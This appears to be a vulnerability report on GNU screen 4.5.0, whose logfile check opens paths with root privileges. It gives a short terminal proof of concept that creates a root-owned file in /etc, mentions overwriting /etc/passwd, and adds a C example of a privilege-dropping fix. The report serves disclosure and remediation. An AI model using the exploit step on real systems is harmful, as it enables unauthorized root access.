root exploit 4.5.0
Commit f86a374 ("screen.c: adding permissions check for the logfile name", 2015-11-04)
The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.
> buczek@theinternet:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> buczek@theinternet:~$ id
> uid=125(buczek) gid=125(buczek) groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> buczek@theinternet:~$ cd /etc
> buczek@theinternet:/etc (master)$ screen -D -m -L bla.bla echo fail
> buczek@theinternet:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> buczek@theinternet:/etc (master)$ cat bla.bla
> fail
> buczek@theinternet:/etc (master)$
Donald Buczek, buczek@molgen.mpg.de
screen-4.5.0-0 might have a security problem.
We were able to overwrite /etc/passwd.
merge of #275 has been undone (3246138)
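The report attributes the problem to a logfile check that opens the path with full root privileges. As an added example (not code from GNU screen or from this report), the following shows one way a setuid program can test and open a user-supplied logfile path with the invoking user's own permissions instead. The helper name `open_log_as_invoker`, the exit code 111 and the `example.log` default are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (added example, not GNU screen's code): open a
 * user-supplied logfile path from a setuid program as the invoking user.
 * Returns an fd opened for append, or -1 with errno set. */
int open_log_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    struct stat st;
    int fd, err = 0;

    /* Drop the group first, then the user; failing to drop is fatal. */
    if (setegid(getgid()) != 0 || seteuid(getuid()) != 0)
        _exit(111);

    /* The kernel now checks every path component against the caller's ids.
     * O_NOFOLLOW refuses a symlink as the last component; there is no
     * O_TRUNC, so a writability check cannot destroy an existing file. */
    fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        err = errno;

    /* Regain the saved ids in reverse order; failure here is fatal too. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0)
        _exit(111);

    /* Log only to regular files. */
    if (fd >= 0 && (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode))) {
        close(fd);
        fd = -1;
        err = EINVAL;
    }
    errno = err;
    return fd;
}

int main(int argc, char **argv)
{
    /* "example.log" is a constructed default path. */
    int fd = open_log_as_invoker(argc > 1 ? argv[1] : "example.log");
    if (fd < 0) { perror("logfile"); return 1; }
    close(fd);
    return 0;
}
```

Run from a setuid-root binary inside a directory the caller cannot write to, such as `/etc`, the `open()` fails with `EACCES` and no file is created or changed.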